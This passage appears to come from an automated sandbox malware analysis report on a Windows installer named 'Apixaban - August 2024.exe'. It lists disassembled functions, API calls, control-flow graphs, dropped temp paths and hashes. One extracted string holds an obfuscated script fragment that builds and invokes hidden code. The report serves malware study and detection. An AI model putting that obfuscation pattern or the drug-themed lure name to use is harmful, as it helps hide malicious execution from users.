455 4060c1-4060c3 453->455 456 406058-406066 GetWindowsDirectoryW 453->456 459 4060c5-4060c9 454->459 455->459 460 406068-406072 455->460 456->455 458->438 459->458 459->462 464 406074-406077 460->464 465 40608c-4060a2 SHGetSpecialFolderLocation 460->465 461->459 462->458 467 4060d1-4060d7 lstrcatW 462->467 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->458 473 406088-40608a 469->473 470->459 470->471 471->455 473->459 473->465
                                                APIs
                                                • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
                                                • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: ';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-3278629893
                                                • Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                • Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
                                                Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 474 405770-405796 call 405a3b 477 405798-4057aa DeleteFileW 474->477 478 4057af-4057b6 474->478 479 40592c-405930 477->479 480 4057b8-4057ba 478->480 481 4057c9-4057d9 call 405ee8 478->481 483 4057c0-4057c3 480->483 484 4058da-4058df 480->484 487 4057e8-4057e9 call 40597f 481->487 488 4057db-4057e6 lstrcatW 481->488 483->481 483->484 484->479 486 4058e1-4058e4 484->486 489 4058e6-4058ec 486->489 490 4058ee-4058f6 call 40622b 486->490 491 4057ee-4057f2 487->491 488->491 489->479 490->479 498 4058f8-40590c call 405933 call 405728 490->498 494 4057f4-4057fc 491->494 495 4057fe-405804 lstrcatW 491->495 494->495 497 405809-405825 lstrlenW FindFirstFileW 494->497 495->497 499 40582b-405833 497->499 500 4058cf-4058d3 497->500 516 405924-405927 call 405192 498->516 517 40590e-405911 498->517 503 405853-405867 call 405ee8 499->503 504 405835-40583d 499->504 500->484 502 4058d5 500->502 502->484 514 405869-405871 503->514 515 40587e-405889 call 405728 503->515 506 4058b2-4058c2 FindNextFileW 504->506 507 40583f-405847 504->507 506->499 510 4058c8-4058c9 FindClose 506->510 507->503 511 405849-405851 507->511 510->500 511->503 511->506 514->506 519 405873-40587c call 405770 514->519 527 4058aa-4058ad call 405192 515->527 528 40588b-40588e 515->528 516->479 517->489 518 405913-405922 call 405192 call 405d82 517->518 518->479 519->506 527->506 530 405890-4058a0 call 405192 call 405d82 528->530 531 4058a2-4058a8 528->531 530->506 531->506
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 00405799
                                                • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405804
                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 0040580A
                                                • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 0040581A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                • FindClose.KERNEL32(00000000), ref: 004058C9
                                                Strings
                                                • \*.*, xrefs: 004057DB
                                                • "C:\Users\user\Desktop\Apixaban - August 2024.exe", xrefs: 00405779
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-872662500
                                                • Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                • Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75572EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406236
                                                • FindClose.KERNEL32(00000000), ref: 00406242
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: WB
                                                • API String ID: 2295610775-2854515933
                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9
                                                Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 167 4038b2-4038ca call 406252 170 4038cc-4038dc call 405e2f 167->170 171 4038de-403915 call 405db5 167->171 179 403938-403961 call 403b88 call 405a3b 170->179 175 403917-403928 call 405db5 171->175 176 40392d-403933 lstrcatW 171->176 175->176 176->179 185 4039f3-4039fb call 405a3b 179->185 186 403967-40396c 179->186 192 403a09-403a2e LoadImageW 185->192 193 4039fd-403a04 call 405f0a 185->193 186->185 187 403972-40399a call 405db5 186->187 187->185 196 40399c-4039a0 187->196 194 403a30-403a60 RegisterClassW 192->194 195 403aaf-403ab7 call 40140b 192->195 193->192 198 403a66-403aaa SystemParametersInfoW CreateWindowExW 194->198 199 403b7e 194->199 209 403ac1-403acc call 403b88 195->209 210 403ab9-403abc 195->210 201 4039b2-4039be lstrlenW 196->201 202 4039a2-4039af call 405960 196->202 198->195 206 403b80-403b87 199->206 203 4039c0-4039ce lstrcmpiW 201->203 204 4039e6-4039ee call 405933 call 405ee8 201->204 202->201 203->204 208 4039d0-4039da GetFileAttributesW 203->208 204->185 213 4039e0-4039e1 call 40597f 208->213 214 4039dc-4039de 208->214 220 403ad2-403aef ShowWindow LoadLibraryW 209->220 221 403b55-403b56 call 405265 209->221 210->206 213->204 214->204 214->213 223 403af1-403af6 LoadLibraryW 220->223 224 403af8-403b0a GetClassInfoW 220->224 225 403b5b-403b5d 221->225 223->224 226 403b22-403b45 DialogBoxParamW call 40140b 224->226 227 403b0c-403b1c GetClassInfoW RegisterClassW 224->227 228 403b77-403b79 call 40140b 225->228 229 403b5f-403b65 225->229 233 403b4a-403b53 call 403802 226->233 227->226 228->199 229->210 231 403b6b-403b72 call 40140b 229->231 231->210 233->206
                                                APIs
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                • RegisterClassW.USER32(00428180), ref: 00403A57
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 914957316-619161790
                                                • Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                • Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
                                                Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 238 403c55-403c67 239 403da8-403db7 238->239 240 403c6d-403c73 238->240 242 403e06-403e1b 239->242 243 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 239->243 240->239 241 403c79-403c82 240->241 244 403c84-403c91 SetWindowPos 241->244 245 403c97-403c9a 241->245 247 403e5b-403e60 call 404179 242->247 248 403e1d-403e20 242->248 243->242 244->245 250 403cb4-403cba 245->250 251 403c9c-403cae ShowWindow 245->251 256 403e65-403e80 247->256 253 403e22-403e2d call 401389 248->253 254 403e53-403e55 248->254 257 403cd6-403cd9 250->257 258 403cbc-403cd1 DestroyWindow 250->258 251->250 253->254 269 403e2f-403e4e SendMessageW 253->269 254->247 255 4040fa 254->255 263 4040fc-404103 255->263 261 403e82-403e84 call 40140b 256->261 262 403e89-403e8f 256->262 266 403cdb-403ce7 SetWindowLongW 257->266 267 403cec-403cf2 257->267 264 4040d7-4040dd 258->264 261->262 272 403e95-403ea0 262->272 273 4040b8-4040d1 DestroyWindow EndDialog 262->273 264->255 270 4040df-4040e5 264->270 266->263 274 403d95-403da3 call 404194 267->274 275 403cf8-403d09 GetDlgItem 267->275 269->263 270->255 277 4040e7-4040f0 ShowWindow 270->277 272->273 278 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 272->278 273->264 274->263 279 403d28-403d2b 275->279 280 403d0b-403d22 SendMessageW IsWindowEnabled 275->280 277->255 308 403ef5-403efa 278->308 309 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 278->309 281 403d30-403d33 279->281 282 403d2d-403d2e 279->282 280->255 280->279 286 403d41-403d46 281->286 287 403d35-403d3b 281->287 285 403d5e-403d63 call 404106 282->285 285->274 289 403d7c-403d8f SendMessageW 286->289 291 403d48-403d4e 286->291 287->289 290 403d3d-403d3f 287->290 289->274 290->285 294 403d50-403d56 call 40140b 291->294 295 403d65-403d6e call 40140b 291->295 306 403d5c 294->306 295->274 304 403d70-403d7a 295->304 304->306 306->285 308->309 312 403f3b-403f3c 309->312 313 403f3e 309->313 314 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403f70-403f81 SendMessageW 314->315 316 403f83 314->316 317 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 315->317 316->317 317->256 326 403fcd-403fcf 317->326 326->256 327 403fd5-403fd9 326->327 328 403ff8-40400c DestroyWindow 327->328 329 403fdb-403fe1 327->329 328->264 331 404012-40403f CreateDialogParamW 328->331 329->255 330 403fe7-403fed 329->330 330->256 332 403ff3 330->332 331->264 333 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->255 333->255 338 40409e-4040b1 ShowWindow call 404179 333->338 340 4040b6 338->340 340->264
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                • ShowWindow.USER32(?), ref: 00403CAE
                                                • DestroyWindow.USER32 ref: 00403CC2
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                • EnableWindow.USER32(?,?), ref: 00403F31
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                                • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                • Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                                                Function 00402DBA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
